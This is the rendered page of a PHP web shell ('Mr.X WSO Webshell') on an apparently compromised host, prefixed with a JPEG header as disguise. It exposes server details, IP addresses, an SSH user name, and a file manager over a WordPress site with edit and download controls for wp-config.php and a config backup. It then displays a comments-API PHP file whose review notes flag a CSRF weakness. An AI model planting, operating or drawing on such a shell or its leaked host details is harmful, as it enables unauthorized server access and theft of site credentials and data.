����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:
Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 08:39:39
1999.30 GB Free: 74.72 GB (3%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 08:35:45drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-09 08:15:43drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
File: /home/httpd/html/freecam2.com/public_html/includes/api.comments.php
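<?php
/**
 * JSON endpoint for performer comments.
 *
 * Dispatches on the `action` request parameter (add-comment, reply-comment,
 * edit-comment, vote-comment, remove-comment, get-comments). Every branch
 * fills $res, which is echoed as JSON at the end of the script.
 *
 * Uses names this file does not define: $dblink, dbQuery(), dbRow(),
 * datediff() and $max_comment_lenght. Presumably they come from
 * ../admin/db.php -- confirm there.
 *
 * NOTE(review): parameters are read from $_REQUEST and no anti-CSRF token is
 * checked, so the state-changing actions are reachable through a plain GET
 * issued from another origin with the user's session cookie. Restricting them
 * to POST plus a per-session token needs a matching client change, so it is
 * flagged here rather than enforced.
 *
 * NOTE(review): no Content-Type header is sent, so the JSON body is served
 * with PHP's default type. Sending application/json would stop a browser from
 * rendering the response as HTML; confirm how the client parses the response
 * before adding it.
 */
session_start();
include '../admin/db.php';

// Read a request parameter as a string; missing or array-valued input becomes ''.
$request_string = function ($key) {
    return (isset($_REQUEST[$key]) && is_scalar($_REQUEST[$key])) ? (string) $_REQUEST[$key] : '';
};

// Read a request parameter as an integer; missing or array-valued input becomes 0.
$request_int = function ($key) {
    return (isset($_REQUEST[$key]) && is_scalar($_REQUEST[$key])) ? (int) $_REQUEST[$key] : 0;
};

// Normalise comment text for storage and display: quotes become typographic
// entities and markup is stripped. SQL escaping is deliberately NOT done here;
// it is applied separately so the text returned to the client and measured by
// the length check is the text itself, not its SQL-escaped form.
$clean_comment = function ($raw) {
    $text = str_replace(array('"', "'"), array('&#8221;', '&#8217;'), $raw);
    return strip_tags($text);
};

$action = $request_string('action');
$res = array();

// Session and server values are interpolated into SQL below, so they are
// escaped like request input: a stored username containing a quote would
// otherwise alter the statement.
$session_userid = isset($_SESSION['userid']) ? $_SESSION['userid'] : null;
$session_username = isset($_SESSION['username']) ? $_SESSION['username'] : null;
$sql_userid = mysqli_real_escape_string($dblink, (string) $session_userid);
$sql_username = mysqli_real_escape_string($dblink, (string) $session_username);
$sql_ip = mysqli_real_escape_string($dblink, isset($_SERVER['REMOTE_ADDR']) ? (string) $_SERVER['REMOTE_ADDR'] : '');

switch ($action) {
    // Both actions insert a row into `comments`; a reply additionally requires
    // that the parent comment exists for the same performer.
    case 'add-comment':
    case 'reply-comment':
        $is_reply = ($action === 'reply-comment');
        $performer_name = mysqli_real_escape_string($dblink, $request_string('performer_name'));
        $performer_site = $request_int('performer_site');
        $comment = $clean_comment($request_string('comment'));
        $sql_comment = mysqli_real_escape_string($dblink, $comment);
        // NOTE(review): add-comment stores whatever `parent` the client sends
        // without the existence check that reply-comment performs. Confirm
        // whether add-comment should always store parent = 0.
        $parent = $request_int('parent');

        if (!$session_userid) {
            $res['status'] = 'error';
            $res['info'] = $is_reply ? "Unauthorized!" : "Commenting available only for logged in users.";
            break;
        }

        if ($comment === '') {
            $res['status'] = 'error';
            $res['info'] = "The comment field is empty. Please write a comment.";
            break;
        }

        if (strlen($comment) > $max_comment_lenght) {
            $res['status'] = 'error';
            $res['info'] = "The maximum length of a comment is $max_comment_lenght.";
            break;
        }

        // Throttle: at most one comment per user and performer in any 60 seconds.
        $now = time() - 60;
        $throttle = dbQuery("SELECT record_num FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND userid = '$sql_userid' AND timestamp > '$now'", false);
        if (is_array($throttle) && count($throttle) > 0) {
            $res['status'] = 'error';
            $res['info'] = "You may only post a comment once every 60 seconds.";
            break;
        }

        $checkPerformer = dbQuery("SELECT username FROM performers WHERE username = '$performer_name' AND site = '$performer_site'", false);
        $target_ok = is_array($checkPerformer);
        if ($target_ok && $is_reply) {
            $checkCommentParent = dbQuery("SELECT record_num FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND record_num = '$parent'", false);
            $target_ok = is_array($checkCommentParent);
        }
        if (!$target_ok) {
            $res['status'] = 'error';
            $res['info'] = "The specified performer does not exist.";
            break;
        }

        $inserted = mysqli_query($dblink, "INSERT INTO comments SET userid = '$sql_userid', name = '$sql_username', comment = '$sql_comment', performer_name = '$performer_name', performer_site = '$performer_site', timestamp = '" . time() . "', ip = '$sql_ip', parent = '$parent'");
        if (!$inserted) {
            // Previously a failed INSERT was still reported as success with id 0.
            $res['status'] = 'error';
            $res['info'] = "The comment could not be saved.";
            break;
        }

        $res['status'] = 'success';
        $res['info'] = "Comment added.";
        $res['result'] = array(
            'id' => mysqli_insert_id($dblink),
            'username' => $session_username,
            'dateAdded' => 'Now',
            'comment' => $comment
        );
    break;

    case 'edit-comment':
        $comment_id = $request_int('comment_id');
        $comment = $clean_comment($request_string('comment'));
        $sql_comment = mysqli_real_escape_string($dblink, $comment);

        if (!$session_userid) {
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!";
            break;
        }

        // NOTE(review): unlike add/reply, an empty comment is accepted here;
        // confirm whether blanking a comment through edit is intended.
        if (strlen($comment) > $max_comment_lenght) {
            $res['status'] = 'error';
            $res['info'] = "The maximum length of a comment is $max_comment_lenght.";
            break;
        }

        // Ownership check: the row must belong to the session user.
        $checkComment = dbQuery("SELECT record_num FROM comments WHERE userid = '$sql_userid' AND record_num = '$comment_id'", false);
        if (is_array($checkComment) && count($checkComment) > 0) {
            dbQuery("UPDATE comments SET comment = '$sql_comment' WHERE userid = '$sql_userid' AND record_num = '$comment_id'", false);
            $res['status'] = 'success';
            $res['info'] = "Comment updated.";
            $res['comment'] = $comment;
        } else {
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!";
        }
    break;

    case 'vote-comment':
        // Votes are keyed on the client IP and need no login; the same request
        // toggles an existing vote off.
        // NOTE(review): the comment id is not checked against `comments`, so
        // likes can be recorded for ids that do not exist.
        if (!is_numeric($request_string('comment_id'))) {
            $res['status'] = 'error';
            $res['info'] = "Invalid comment id.";
            break;
        }

        $comment_id = $request_int('comment_id');
        $checkVoted = dbQuery("SELECT comment_id FROM comments_likes WHERE comment_id = '$comment_id' AND ip = '$sql_ip'", false);
        if (is_array($checkVoted) && count($checkVoted) > 0) {
            dbQuery("DELETE FROM comments_likes WHERE comment_id = '$comment_id' AND ip = '$sql_ip'", false);
            $res['status'] = 'removed';
        } else {
            dbQuery("INSERT INTO comments_likes SET comment_id = '$comment_id', ip = '$sql_ip'", false);
            $res['status'] = 'added';
        }
    break;

    case 'remove-comment':
        $comment_id = $request_int('comment_id');

        if (!$session_userid) {
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!";
            break;
        }

        // Ownership check before any delete runs.
        $checkComment = dbQuery("SELECT record_num FROM comments WHERE userid = '$sql_userid' AND record_num = '$comment_id'", false);
        if (is_array($checkComment) && count($checkComment) > 0) {
            dbQuery("DELETE FROM comments WHERE userid = '$sql_userid' AND record_num = '$comment_id'", false);
            // Replies to the removed comment go with it, whoever wrote them.
            dbQuery("DELETE FROM comments WHERE parent = '$comment_id'", false);
            dbQuery("DELETE FROM comments_likes WHERE comment_id = '$comment_id'", false);
            $res['status'] = 'success';
            $res['info'] = "Comment removed.";
        } else {
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!";
        }
    break;

    case 'get-comments':
        $performer_name = mysqli_real_escape_string($dblink, $request_string('performer_name'));
        $performer_site = $request_int('performer_site');
        // A negative offset or count makes the LIMIT clause invalid SQL; clamp to 0.
        // NOTE(review): `limit` has no upper bound and each top-level comment
        // costs one extra query for its replies; consider a server-side cap.
        $from = max(0, $request_int('from'));
        $limit = max(0, $request_int('limit'));

        // Only fixed ORDER BY fragments are used; the request value selects
        // one of them and is never placed in the SQL itself.
        $order_by = array(
            'newest' => " ORDER BY timestamp DESC ",
            'oldest' => " ORDER BY timestamp ASC ",
            'popular' => " ORDER BY likes DESC "
        );
        $sortby = $request_string('sort');
        $andOrder = isset($order_by[$sortby]) ? $order_by[$sortby] : $order_by['newest'];

        // Adds the display fields the client expects and drops the stored
        // commenter IP so it is not published to every reader.
        $decorate = function ($row) use ($session_userid) {
            $row['added'] = datediff('n', $row['timestamp'], time(), true) . ' ago';
            $row['owner'] = ($session_userid && $session_userid == $row['userid']) ? 1 : 0;
            $row['show_reply'] = $session_userid ? true : false;
            unset($row['ip']);
            return $row;
        };

        $total_results = dbRow("SELECT COUNT(record_num) AS amount FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND parent = '0'", false);
        $total_results = $total_results['amount'];
        $results = dbQuery("SELECT comments.*, (SELECT COUNT(comment_id) FROM comments_likes WHERE comments_likes.comment_id = comments.record_num) AS likes FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND parent = '0' $andOrder LIMIT $from, $limit", false);

        if (is_array($results) && count($results) > 0) {
            $items = array();
            foreach ($results as $item) {
                $parent_id = (int) $item['record_num'];
                $replies = dbQuery("SELECT comments.*, (SELECT COUNT(comment_id) FROM comments_likes WHERE comments_likes.comment_id = comments.record_num) AS likes FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND parent = '$parent_id' ORDER BY timestamp DESC", false);

                $replies_arr = array();
                if (is_array($replies)) {
                    foreach ($replies as $reply) {
                        $replies_arr[] = $decorate($reply);
                    }
                }

                $item = $decorate($item);
                $item['replies'] = $replies_arr;
                $items[] = $item;
            }
            $res['status'] = 'success';
            $res['total_results'] = $total_results;
            $res['results'] = $items;
        } else {
            $res['status'] = 'success';
            $res['info'] = 'No comments where found.';
            $res['total_results'] = 0;
            $res['results'] = false;
        }
    break;

    default:
        $res['status'] = 'error';
        $res['info'] = 'Unknown command.';
    break;
}

echo json_encode($res);
exit();

?>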